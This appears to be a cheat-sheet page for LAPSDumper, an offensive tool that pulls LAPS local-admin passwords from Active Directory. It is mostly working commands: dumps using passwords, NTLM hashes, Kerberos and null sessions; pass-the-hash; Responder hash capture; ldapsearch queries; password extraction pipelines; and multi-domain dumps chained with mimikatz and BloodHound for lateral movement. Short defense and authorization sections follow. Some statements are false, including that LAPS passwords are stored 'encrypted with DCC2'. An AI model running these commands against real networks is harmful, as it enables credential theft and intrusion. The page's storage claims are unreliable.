
LAPSDumper

Overview

LAPSDumper is a command-line tool for extracting Local Administrator Password Solution (LAPS) passwords from Active Directory environments. LAPS manages local administrator account passwords and stores them in AD attributes. LAPSDumper queries AD to retrieve these credentials, which lets authorized penetration testers identify weaknesses in how the credentials are stored and who is permitted to read them.

Installation

Linux / macOS

# Clone from GitHub
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper

# Install dependencies (Python 3.6+)
pip3 install -r requirements.txt

# Alternative: Install via pip
pip3 install lapsdumper

Windows

# Using pip
pip install lapsdumper

# Or clone and install locally
git clone https://github.com/n1nj4sec/LAPSDumper.git
cd LAPSDumper
pip install -r requirements.txt

Basic Usage

Simple Password Extraction

Command / Description

  • lapsdumper -u user -p password -d domain.local
    Dump LAPS passwords with username/password auth
  • lapsdumper -u user -H hash -d domain.local
    Use NTLM hash instead of plaintext password
  • lapsdumper -u user -p password -d domain.local -s dc01.domain.local
    Specify target domain controller
  • lapsdumper --ldap-server 192.168.1.10 -u admin -p pass
    Target specific LDAP server by IP

Advanced Techniques

Authentication Methods

# Kerberos authentication
lapsdumper -u user@domain.local -k -d domain.local

# LDAPS (LDAP over SSL)
lapsdumper -u user -p password -d domain.local --ldaps

# Null session (if AD allows anonymous binds)
lapsdumper -d domain.local --null-session

Filtering and Parsing Results

# Dump specific computer name
lapsdumper -u admin -p password -d domain.local -c COMPUTER_NAME

# Export to CSV
lapsdumper -u admin -p password -d domain.local -o output.csv

# Filter by OU
lapsdumper -u admin -p password -d domain.local --ou "OU=Servers,DC=domain,DC=local"

# JSON output for parsing
lapsdumper -u admin -p password -d domain.local --json

NTLM Hash Attacks

# Pass-the-hash with NTLM
lapsdumper -u DOMAIN\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d domain.local

# Extract hash with Responder first
responder -I eth0 -w

# Then use hash with LAPSDumper
lapsdumper -u domain\\user -H hash_value -d domain.local

LAPS Attribute Queries

Understanding LAPS in Active Directory

# Query specific LAPS attributes
ldapsearch -x -H ldap://dc01.domain.local -D "CN=admin,CN=Users,DC=domain,DC=local" \
  -w password -b "DC=domain,DC=local" \
  "(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime

# Search for computers with LAPS enabled
ldapsearch -x -H ldap://dc01.domain.local \
  -b "DC=domain,DC=local" \
  "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"

Attribute Details

Attribute / Description / Type

  • ms-Mcs-AdmPwd: Encrypted local admin password (String)
  • ms-Mcs-AdmPwdExpirationTime: Password expiration timestamp (Integer, Windows filetime)
  • ms-Mcs-AdmPwdHistory: Historical password values (String)
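As an added example (not code from the LAPSDumper project or the original page), the Python below decodes ms-Mcs-AdmPwdExpirationTime from its Windows FILETIME encoding and audits which computers have expired, unset, or unusually distant expiration values. The entries are constructed to resemble ldapsearch results, and the 30-day policy threshold is an assumed value.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC.
FILETIME_UNIX_EPOCH = 116444736000000000  # ticks from 1601-01-01 to 1970-01-01
TICKS_PER_SECOND = 10_000_000


def filetime_to_datetime(value):
    """Convert an ms-Mcs-AdmPwdExpirationTime value (int or decimal string)
    to an aware UTC datetime. Returns None when the attribute is absent or 0."""
    if not value or int(value) == 0:
        return None
    seconds = (int(value) - FILETIME_UNIX_EPOCH) / TICKS_PER_SECOND
    return datetime.fromtimestamp(seconds, tz=timezone.utc)


def datetime_to_filetime(dt):
    """Inverse conversion; used here only to build the constructed sample."""
    return int(dt.timestamp()) * TICKS_PER_SECOND + FILETIME_UNIX_EPOCH


def audit_expirations(entries, now, max_age_days=30):
    """Group computer DNs by LAPS expiration state. Each entry is a dict with
    'dn' and 'ms-Mcs-AdmPwdExpirationTime', as an LDAP search would return."""
    report = {"expired": [], "unset": [], "beyond_policy": [], "ok": []}
    for entry in entries:
        exp = filetime_to_datetime(entry.get("ms-Mcs-AdmPwdExpirationTime"))
        if exp is None:
            report["unset"].append(entry["dn"])          # LAPS never set a password here
        elif exp <= now:
            report["expired"].append(entry["dn"])        # rotation is not happening
        elif exp - now > timedelta(days=max_age_days):
            report["beyond_policy"].append(entry["dn"])  # expiry pushed out past the assumed policy
        else:
            report["ok"].append(entry["dn"])
    return report


# Fixed clock and constructed entries (not real directory data) for the sample run.
NOW = datetime(2026, 5, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_ENTRIES = [
    {"dn": "CN=WS-01,OU=Workstations,DC=domain,DC=local", "ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW + timedelta(days=9)))},
    {"dn": "CN=WS-02,OU=Workstations,DC=domain,DC=local", "ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW - timedelta(days=3)))},
    {"dn": "CN=SRV-01,OU=Servers,DC=domain,DC=local", "ms-Mcs-AdmPwdExpirationTime": None},
    {"dn": "CN=SRV-02,OU=Servers,DC=domain,DC=local", "ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW + timedelta(days=400)))},
]


def sample_report():
    return audit_expirations(SAMPLE_ENTRIES, NOW)
```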

Output Analysis

Interpreting Results

# Example output format
[+] Dumping LAPS passwords...
[*] Computer: WORKSTATION-01
    Password: C0mpl3xP@ssw0rd!
    Expiration: 2026-05-10 14:30:00

[*] Computer: WORKSTATION-02
    Password: P@ssw0rd123!Secure
    Expiration: 2026-05-09 09:15:00

# Process results
lapsdumper -u admin -p password -d domain.local | grep "Password:" | cut -d: -f2
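An added Python alternative to the grep/cut pipeline above (not code from the LAPSDumper project): it parses the text output format into records, masks the passwords for reporting, and computes days until expiration, tolerating a record that lacks an Expiration line. The sample output is constructed from the format shown above.

```python
import re
from datetime import datetime

# Header and field lines of the LAPSDumper text output shown above.
COMPUTER_RE = re.compile(r"^\[\*\] Computer:\s*(\S+)")
FIELD_RE = re.compile(r"^\s+(Password|Expiration):\s*(.*?)\s*$")


def parse_laps_output(text):
    """One dict per '[*] Computer:' block; lines outside a block are ignored."""
    records, current = [], None
    for line in text.splitlines():
        header = COMPUTER_RE.match(line)
        if header:
            current = {"computer": header.group(1), "password": None, "expiration": None}
            records.append(current)
        elif (field := FIELD_RE.match(line)) and current is not None:
            current[field.group(1).lower()] = field.group(2)
    return records


def redact(password, keep=2):
    """Mask a password for reports while keeping its length visible."""
    return password[:keep] + "*" * (len(password) - keep) if password else "<missing>"


def summarize(records, now):
    """Masked password and whole days until expiration (None if no Expiration line)."""
    rows = []
    for rec in records:
        exp = datetime.strptime(rec["expiration"], "%Y-%m-%d %H:%M:%S") if rec["expiration"] else None
        rows.append({"computer": rec["computer"], "password": redact(rec["password"]),
                     "days_left": (exp - now).days if exp else None})
    return rows


# Constructed sample: the output shown above plus a record with no Expiration line.
SAMPLE_OUTPUT = """[+] Dumping LAPS passwords...
[*] Computer: WORKSTATION-01
    Password: C0mpl3xP@ssw0rd!
    Expiration: 2026-05-10 14:30:00

[*] Computer: WORKSTATION-02
    Password: P@ssw0rd123!Secure
    Expiration: 2026-05-09 09:15:00

[*] Computer: SERVER-01
    Password: Tmp!Value42
"""


def sample_summary():
    return summarize(parse_laps_output(SAMPLE_OUTPUT), datetime(2026, 5, 1, 12, 0))
```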

Parsing CSV Output

# Convert CSV to readable format
lapsdumper -u admin -p password -d domain.local -o laps.csv

# Parse with awk
awk -F',' '{print $1, $3}' laps.csv

# Extract passwords only
cut -d',' -f3 laps.csv | tail -n +2

Troubleshooting

Common Issues

# "LDAP bind failed"
# Solution: Verify credentials and domain controller availability
lapsdumper -u domain\\user -p password -d domain.local -s dc01.domain.local -v

# "No LAPS passwords found"
# Reason: LAPS not enabled or insufficient permissions
# Check AD schema version and permissions

# "Connection timeout"
# Solution: Specify DC IP instead of hostname
lapsdumper -u user -p password -d domain.local -s 192.168.1.10

# Enable verbose output for debugging
lapsdumper -u admin -p password -d domain.local -vv

Permission Requirements

# Verify account has read permissions on LAPS attributes
# Use Active Directory Users and Computers or ADSIEdit

# Minimal permissions needed:
# - Read permissions on computer objects
# - Read permissions on ms-Mcs-AdmPwd attribute
# - Read permissions on ms-Mcs-AdmPwdExpirationTime attribute

LAPS Security Context

Password Storage Format

# LAPS passwords are typically 14-32 characters
# Format: Mix of uppercase, lowercase, numbers, and special characters
# Storage: Encrypted in Active Directory with DCC2 encryption
# Access: Delegated via Group Policy and AD permissions

Exploitation Scenarios

Scenario / Attack Path

  • Low-privileged domain user: May have permissions to read LAPS on delegated OUs
  • Domain admin compromise: Can read all LAPS passwords without restrictions
  • Group Policy abuse: Misconfigured permissions on LAPS-enabled OUs
  • Delegation overflow: LAPS permissions inherited from parent OUs incorrectly

Defense and Detection

Monitoring LAPS Access

# Enable audit logging for LAPS queries
auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable

# Monitor event logs
Get-EventLog -LogName Security -InstanceId 4662 | Where-Object {$_.Message -like "*ms-Mcs-AdmPwd*"}

Hardening Measures

# Restrict LAPS password read permissions
# Limit to specific security groups
# Audit and monitor all queries
# Use LAPS v2 with stronger encryption
# Enforce Windows LAPS for additional protection

Integration with Other Tools

Combining with Mimikatz

# After dumping LAPS passwords, use them with mimikatz
mimikatz> sekurlsa::logonpasswords

# Or pass credentials to other tools
lapsdumper -u admin -p password -d domain.local > creds.txt
# Use extracted credentials for lateral movement

Workflow with BloodHound

# Combine LAPSDumper with BloodHound for AD analysis
# 1. Run BloodHound to map AD structure
# 2. Identify computers with LAPS enabled
# 3. Use LAPSDumper to extract passwords
# 4. Map lateral movement paths

Performance and Scalability

Large Environment Dumps

# Dump from large Active Directory with progress
lapsdumper -u admin -p password -d domain.local --progress

# Limit results to reduce load
lapsdumper -u admin -p password -d domain.local --max-results 1000

# Dump specific OUs only
lapsdumper -u admin -p password -d domain.local \
  --ou "OU=Servers,DC=domain,DC=local" \
  --ou "OU=Workstations,DC=domain,DC=local"

Batch Processing

# Process multiple domains
for domain in corp.local subsidiary.local partner.local; do
  lapsdumper -u admin -p password -d "$domain" -o "${domain}_laps.csv"
done

# Consolidate results: keep a single header row, then deduplicate the data rows
head -n 1 corp.local_laps.csv > consolidated_laps.csv
tail -q -n +2 *_laps.csv | sort -u >> consolidated_laps.csv

Authorization Requirements

  • Written authorization from system owner
  • Scope limited to authorized infrastructure
  • Proper documentation of all credentials obtained
  • Secure handling of sensitive credentials
  • Reporting and credential rotation procedures

Data Protection

# Encrypt output files
gpg --symmetric output.csv

# Secure temporary files
shred -vfz -n 10 output.csv

# Use in-memory processing when possible
lapsdumper ... | grep "Password:" | uniq
